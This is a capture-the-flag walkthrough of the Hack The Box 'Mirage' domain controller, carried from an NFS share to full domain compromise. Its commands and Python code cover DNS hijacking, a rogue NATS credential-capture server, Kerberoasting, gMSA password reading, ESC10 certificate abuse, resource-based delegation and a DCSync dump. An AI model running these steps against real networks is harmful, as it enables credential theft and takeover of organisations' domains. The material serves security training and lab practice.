HTB-Mirage

Friday, 25 July 2025

Information gathering

nmap -sC -sV 10.10.11.78
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-25 15:37 CST
Nmap scan report for mirage.htb (10.10.11.78)
Host is up (0.13s latency).
Not shown: 947 closed tcp ports (reset), 39 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-25 14:14:19Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|_  100005  1,2,3       2049/udp6  mountd
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h36m19s
| smb2-time: 
|   date: 2025-07-25T14:15:11
|_  start_date: N/A

The target is a domain controller. NFS and SMB are exposed alongside the usual AD ports, so those two services are probed first.

Testing shows that the NFS export can be mounted anonymously, while SMB refuses to let us log in.

showmount -e 10.10.11.78
image-20250725154546645

Mount the export on a local directory and look inside: two PDF files.

image-20250725154720244

image-20250725154752633

The PDFs give us two useful facts: a new hostname, nats-svc.mirage.htb, and the fact that the organisation is phasing out NTLM in favour of Kerberos.

Interestingly, that hostname does not resolve; there is no server behind it. We can therefore hijack the name and stand up a fake NATS server: whatever client still tries to reach nats-svc will connect to us and hand over its NATS username and password.

Point the hostname at our own IP with a dynamic DNS update:

nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.14.3
> send

The update is accepted without any TSIG/GSS-TSIG key, which means the mirage.htb zone allows unauthenticated dynamic updates from anything that can reach the DC on 53/tcp; that misconfiguration is what the hijack relies on (10.10.14.3 is our attacking host).

fakents.py, the rogue NATS listener:

import socket

# Minimal rogue NATS server. A NATS server speaks first with an INFO line; a
# client that sees auth_required:true answers with CONNECT {...} carrying its
# credentials, and without TLS they arrive in the clear.
PORT = 4222  # default NATS client port

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", PORT))
s.listen(5)
print(f"[+] Fake NATS Server listening on 0.0.0.0:{PORT}")

while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")

    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode(errors="replace"))

    client.close()
image-20250725161611082

The client that connects sends us a NATS username and password:

CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
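The captured CONNECT line shows how little a rogue server has to do: send INFO with auth_required set, then read one line. The following Python is an added example, not the page's fakents.py nor NATS project code. It runs the server side of that exchange, parses the CONNECT JSON, extracts every credential-bearing field the protocol allows (user/pass, token, JWT, nkey signature), and drives itself against a local client that replays the captured line. The listener port is ephemeral here rather than 4222, and SAMPLE_CONNECT is constructed from the line above.

```python
import json
import socket
import threading

# Constructed sample: the CONNECT a NATS client sends after the server's INFO,
# in the same shape as the one captured on this page.
SAMPLE_CONNECT = (
    b'CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A",'
    b'"pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2",'
    b'"lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,'
    b'"no_responders":false}\r\n'
)

# INFO advertised by the rogue server. auth_required:true makes a real client put
# its credentials into CONNECT; no TLS is advertised, so a client that does not
# insist on tls_required sends them in the clear.
FAKE_INFO = b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n'


def parse_connect(line: bytes) -> dict:
    """Parse one NATS CONNECT line into the client's JSON options ({} if not a CONNECT)."""
    if not line.startswith(b"CONNECT "):
        return {}
    try:
        return json.loads(line[len(b"CONNECT "):].strip())
    except ValueError:
        return {}


def extract_credentials(options: dict) -> dict:
    """Keep only the credential-bearing CONNECT fields defined by the NATS protocol."""
    return {k: options[k] for k in ("user", "pass", "auth_token", "jwt", "nkey", "sig")
            if k in options}


def handle_client(conn: socket.socket) -> dict:
    """Server side of the INFO -> CONNECT exchange on one accepted connection."""
    conn.sendall(FAKE_INFO)
    buf = b""
    while b"\r\n" not in buf:              # read up to the end of the first line
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    creds = extract_credentials(parse_connect(buf.split(b"\r\n", 1)[0]))
    conn.sendall(b"+OK\r\n")               # keep a verbose client happy before closing
    conn.close()
    return creds


def serve_once(host: str = "127.0.0.1", port: int = 0) -> tuple:
    """Listen for a single client in a thread; returns (bound_port, thread, result dict)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    result = {}

    def run():
        conn, _ = srv.accept()
        result.update(handle_client(conn))
        srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return srv.getsockname()[1], t, result


def demo() -> dict:
    """Loopback run: a client replays SAMPLE_CONNECT against the rogue server."""
    port, t, result = serve_once()
    c = socket.create_connection(("127.0.0.1", port))
    info = c.recv(4096)                    # the server speaks first
    assert info.startswith(b"INFO ")
    c.sendall(SAMPLE_CONNECT)
    c.recv(4096)                           # +OK
    c.close()
    t.join(timeout=5)
    return result
```

demo() returns {"user": "Dev_Account_A", "pass": "hx5h7F5554fP@1337!"} for the sample; on an engagement, bind 0.0.0.0:4222 as the page's script does and point the hijacked name at the host.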

With these credentials we can pull more out of NATS. A live subscription to ">" shows which subjects are in use; the historical messages sit in the JetStream stream auth_logs, so we add a pull consumer on it and fetch the stored messages:

nats context add dev-nats \
  --server nats://dc01.mirage.htb:4222 \
  --user Dev_Account_A \
  --password 'hx5h7F5554fP@1337!' \
  --description "Dev access"
nats --context dev-nats sub ">" --count 10
nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack

Among the stored messages is another set of credentials:

"user":"david.jjackson","password":"pN8kQmn6b86!1234@"
image-20250725162439921

Check whether this account can authenticate to LDAP. Since NTLM is being retired, Kerberos (-k) is used for everything from here on:

nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
image-20250725163215045

Collect BloodHound data with this account:

bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.10.11.78 -c All --zip

Analysing the domain data for david.jjackson turns up nothing exploitable on the account itself. Next, look for accounts with an SPN and request their service tickets (Kerberoasting):

impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
image-20250725164031558

The TGS hash returned for nathan.aadam cracks straight away with john:

nathan.aadam/3edc#EDC3
image-20250725164208847

Initial shell

Log in over WinRM with a Kerberos ccache.

Obtain the ccache for nathan.aadam:

impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3'
image-20250725164538426

image-20250725164421646

That gives us user.txt.

Lateral movement in the domain

Gather information on the box with winPEAS (I got stuck at this point on my own and consulted a writeup online).

After it runs, a username and password come out:

mark.bbond:'1day@atime'

Analyse this user's rights in BloodHound:

image-20250725170430483

This user has ForceChangePassword over javier, so we can set that account's password directly and keep pivoting with it.

image-20250725170930482

javier in turn has ReadGMSAPassword over Mirage-Service (ReadGMSAPassword is an Active Directory permission that lets a specific user or computer account read the password of a gMSA, a group managed service account).

That gives us an attack chain:

Change javier's password

export KRB5CCNAME=mark.bbond.ccache
# javier.mmarshall is disabled, so clear the ACCOUNTDISABLE flag in userAccountControl first
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 remove uac javier.mmarshall -f ACCOUNTDISABLE
# set the password
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 set password javier.mmarshall '1day@atime'
# then lift javier's logon-hours restriction (a simple bind over plaintext ldap://, so this password crosses the wire unencrypted)
ldapmodify -H ldap://10.10.11.78 -D "mark.bbond@mirage.htb" -w '1day@atime' -f logonhours.ldif

logonhours.ldif:
dn: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
changetype: modify
replace: logonHours
logonHours:: ////////////////////////////
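The logonHours line in the LDIF is base64 of 21 bytes of 0xFF. The attribute is a 168-bit bitmap, one bit per hour of the week starting at Sunday 00:00 UTC with the low bit of each byte first, and a disabled-by-policy account typically has all bits cleared, which is why javier could not log on even after being re-enabled. The Python below is an added example, not from the page or any tool it uses: it builds a logonHours value from a set of allowed hours, decodes one back, renders it as LDIF and summarises it per day, so an existing restriction can be read before it is overwritten. The bit layout is the one Microsoft documents for logonHours; no other assumptions are made.

```python
import base64

HOURS_PER_WEEK = 24 * 7            # logonHours is a 168-bit bitmap stored in 21 bytes
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]


def encode_logon_hours(allowed) -> bytes:
    """Build the 21-byte logonHours value from an iterable of allowed hour indices.

    Hour 0 is Sunday 00:00-01:00 UTC; hour i lives in bit (i % 8) of byte (i // 8),
    least significant bit first, as Active Directory stores it.
    """
    bitmap = bytearray(HOURS_PER_WEEK // 8)
    for h in allowed:
        if not 0 <= h < HOURS_PER_WEEK:
            raise ValueError(f"hour index {h} out of range 0..167")
        bitmap[h // 8] |= 1 << (h % 8)
    return bytes(bitmap)


def decode_logon_hours(value: bytes) -> list:
    """Return the allowed hour indices (0..167) from a raw logonHours value."""
    if len(value) != HOURS_PER_WEEK // 8:
        raise ValueError("logonHours must be exactly 21 bytes")
    return [h for h in range(HOURS_PER_WEEK) if (value[h // 8] >> (h % 8)) & 1]


def ldif_value(value: bytes) -> str:
    """Render the attribute the way LDIF writes binary values: 'logonHours:: <base64>'."""
    return "logonHours:: " + base64.b64encode(value).decode("ascii")


def describe(value: bytes) -> str:
    """Summarise per day as 'Mon 09-17 UTC' (first to last allowed hour of that day)."""
    allowed = decode_logon_hours(value)
    if len(allowed) == HOURS_PER_WEEK:
        return "all hours"
    if not allowed:
        return "no hours (logon never permitted)"
    parts = []
    for d, day in enumerate(DAYS):
        hrs = [h - d * 24 for h in allowed if d * 24 <= h < (d + 1) * 24]
        if hrs:
            parts.append(f"{day} {hrs[0]:02d}-{hrs[-1] + 1:02d} UTC")
    return ", ".join(parts)


# The value used in the LDIF above: every bit set.
ALL_HOURS = encode_logon_hours(range(HOURS_PER_WEEK))
```

ldif_value(ALL_HOURS) reproduces the line of 28 slashes from the LDIF. Note the hours are UTC; the Windows GUI shifts them into the local time zone, which is a common source of confusion when a restriction looks "off by a few hours".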


Then read the gMSA password as javier.mmarshall:
impacket-getTGT mirage.htb/javier.mmarshall:'1day@atime' -dc-ip 10.10.11.78
nxc ldap 10.10.11.78 -u javier.mmarshall -p '1day@atime' --gmsa -k -d mirage.htb --kdcHost dc01.mirage.htb
image-20250725174936963
bloodyAD -k --host dc01.mirage.htb -d 'mirage.htb' -u 'javier.mmarshall' -p '1day@atime' get object 'Mirage-Service$' --attr msDS-ManagedPassword
image-20250725175441029

Both tools decode the msDS-ManagedPassword blob and print the NT hash of Mirage-Service$'s current password.

Get a TGT for it:

impacket-getTGT mirage.htb/Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.10.11.78
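What nxc and bloodyAD did to turn msDS-ManagedPassword into the hash used above: the attribute is an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19) whose CurrentPassword field is a null-terminated UTF-16LE string, and the NT hash is MD4 over those UTF-16LE bytes. The Python below is an added example, not the code of either tool. MD4 is implemented inline because hashlib on current OpenSSL builds often refuses it. The blob fed to the demonstration is constructed with a known password so the result can be checked against the well-known NT hash of "password"; a real gMSA password is a long random UTF-16 string that is only ever read over LDAP, never typed.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python; hashlib's md4 is frequently unavailable)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)        # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k = lambda x, y, z: x ^ y ^ z
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                   # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            a = _rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            a = _rotl((a + k(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse MSDS-MANAGEDPASSWORD_BLOB: Version(2) Reserved(2) Length(4)
    CurrentPasswordOffset(2) PreviousPasswordOffset(2) QueryPasswordIntervalOffset(2)
    UnchangedPasswordIntervalOffset(2), followed by the variable-length fields."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 managed password blob")

    def utf16z(off: int):
        if off == 0:                                  # offset 0 means "field absent"
            return None
        end = off
        while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
            end += 2
        return blob[off:end].decode("utf-16-le")

    return {
        "current": utf16z(cur_off),
        "previous": utf16z(prev_off),
        "query_interval_100ns": struct.unpack_from("<Q", blob, qpi_off)[0],
        "unchanged_interval_100ns": struct.unpack_from("<Q", blob, upi_off)[0],
    }


def gmsa_nt_hash(blob: bytes) -> str:
    """The value the tools print: NT hash of the blob's current password."""
    return nt_hash(parse_managed_password_blob(blob)["current"])


def build_managed_password_blob(current: str, previous: str = "") -> bytes:
    """Constructed test blob with the same layout (demonstration only)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    header_len = 16
    cur_off = header_len
    prev_off = cur_off + len(cur) if previous else 0
    body = cur + prev
    body += b"\x00" * ((-(header_len + len(body))) % 8)   # 8-byte align the intervals
    qpi_off = header_len + len(body)
    upi_off = qpi_off + 8
    day = 24 * 3600 * 10_000_000                           # one day in 100 ns units
    body += struct.pack("<QQ", day, day)
    return struct.pack("<HHIHHHH", 1, 0, header_len + len(body), cur_off, prev_off, qpi_off, upi_off) + body
```

The hash is all you need for getTGT -hashes, which is why ReadGMSAPassword is effectively "log in as the service account".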

ESC10

The service account has no obvious next step of its own, so we go back to enumeration.

ESC10 abuses weak certificate-to-account mapping: the DC identifies the holder of a certificate by the UPN in its SAN rather than by the account's SID. If we can set a victim account's userPrincipalName to another principal's name, enrol a certificate as the victim, and then put the UPN back, the certificate authenticates as that other principal. What we still need, then, is an account whose userPrincipalName we control. Fortunately Mirage-Service$ can modify mark.bbond's userPrincipalName: it holds WRITE_PROP on the Public-Information property set of the mark.bbond object, and UPN is one of the attributes in that set. This shows up in mark.bbond's resolved security descriptor:

bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.10.11.78 get object mark.bbond --resolve-sd

ESC10 attack

# set the controlled user's userPrincipalName to the target principal (the DC machine account)
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'DC01$@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb

# request a certificate from the User template as the controlled user; the SAN UPN is taken from the account's current UPN, so the certificate comes out for DC01$@mirage.htb
export KRB5CCNAME=mark.bbond.ccache
certipy-ad req -ca 'mirage-DC01-CA' -username mark.bbond -password '1day@atime' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb -k -no-pass

# restore the original UPN (mandatory, not optional: if mark.bbond still carried DC01$@mirage.htb, the UPN lookup during authentication would resolve to mark.bbond instead of the DC)
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'mark.bbond@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.10.11.78 -ns 10.10.11.78 -target dc01.mirage.htb
# authenticate with the certificate over LDAPS (Schannel), open an LDAP shell as DC01$ and configure resource-based constrained delegation on DC01
certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.108.73 -ns 10.10.11.78 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'DC01$@mirage.htb'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

set_rbcd dc01$ nathan.aadam

Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=nathan.aadam,OU=Users,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1110
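set_rbcd wrote a security descriptor into DC01's msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL contains one ACCESS_ALLOWED ACE for nathan.aadam's SID. The Python below is an added example, not certipy's or impacket's code: it builds that self-relative descriptor the same way (owner BUILTIN\Administrators, one full-control ACE per grantee) and decodes one back to the grantee SIDs. The decode half is also the check a defender wants, since a domain controller should never have a non-empty value in this attribute. The SIDs are the ones from the output above; the ACE type, control flags and the 0x000F01FF full-control mask are the standard values.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
FULL_CONTROL = 0x000F01FF          # mask written by set_rbcd / impacket rbcd.py

# SIDs from the set_rbcd output on this page.
DC01_SID = "S-1-5-21-2127163471-3824721834-2568365109-1000"
NATHAN_SID = "S-1-5-21-2127163471-3824721834-2568365109-1110"


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-a-b-c-rid' -> binary SID: revision, sub-authority count,
    48-bit identifier authority (big-endian), sub-authorities (little-endian)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("malformed SID")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int = 0) -> tuple:
    """Return (sid_string, size_in_bytes) for the binary SID at buf[off]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(grantee_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR with a DACL of ACCESS_ALLOWED ACEs, one per
    grantee: the value stored in msDS-AllowedToActOnBehalfOfOtherIdentity."""
    owner = sid_to_bytes("S-1-5-32-544")          # BUILTIN\Administrators
    aces = b""
    for sid in grantee_sids:
        s = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), FULL_CONTROL) + s
    # ACL header: revision 4 (ACL_REVISION_DS), sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(grantee_sids), 0) + aces
    owner_off = 20                                  # header is 20 bytes
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, group_off, 0, dacl_off)
    return header + owner + owner + acl


def rbcd_grantees(sd: bytes) -> list:
    """Who may act on behalf of the object: SIDs of the ACCESS_ALLOWED ACEs in the DACL."""
    if len(sd) < 20:
        return []
    rev, _, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _rev, _, _size, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd, pos + 8)[0])
        pos += ace_size
    return sids


def dc_rbcd_findings(sd: bytes, names: dict) -> list:
    """Defender view: resolve grantees to names; anything returned for a DC is a finding."""
    return [names.get(s, s) for s in rbcd_grantees(sd)]
```

Reading the attribute back with any LDAP client and passing the bytes to rbcd_grantees() is a cheap detective control; restoring the pre-attack state means clearing the attribute on DC01, which set_rbcd leaves populated.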

Two things are worth noticing in that output. The certificate's security-extension SID is RID 1109, the SID of the enrolling account mark.bbond, yet the LDAPS session is authenticated as MIRAGE\DC01$ (RID 1000): Schannel mapped the certificate by its SAN UPN and ignored the SID, which is exactly the weak mapping ESC10 depends on. set_rbcd then writes nathan.aadam's SID into DC01's msDS-AllowedToActOnBehalfOfOtherIdentity, so nathan.aadam (an account with an SPN, as the Kerberoast showed) may obtain service tickets to DC01 on behalf of other users via S4U2Self/S4U2Proxy.

RBCD attack

With nathan.aadam's TGT in KRB5CCNAME (from the earlier getTGT), request a CIFS ticket for DC01 while impersonating DC01$:

impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.10.11.78 'mirage.htb/nathan.aadam' -k -no-pass

DCSync with impacket-secretsdump

# DCSync as DC01$: domain controllers hold the replication rights, so the impersonated ticket is enough
export KRB5CCNAME=dc01\$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache 
impacket-secretsdump -just-dc-user Administrator -k -no-pass dc01.mirage.htb

# get a TGT for Administrator with the dumped NT hash (overpass-the-hash)
impacket-getTGT mirage.htb/Administrator -dc-ip 10.10.11.78 -hashes aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3 -debug

# log in to DC01 over WinRM with that ticket
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb  -r mirage.htb
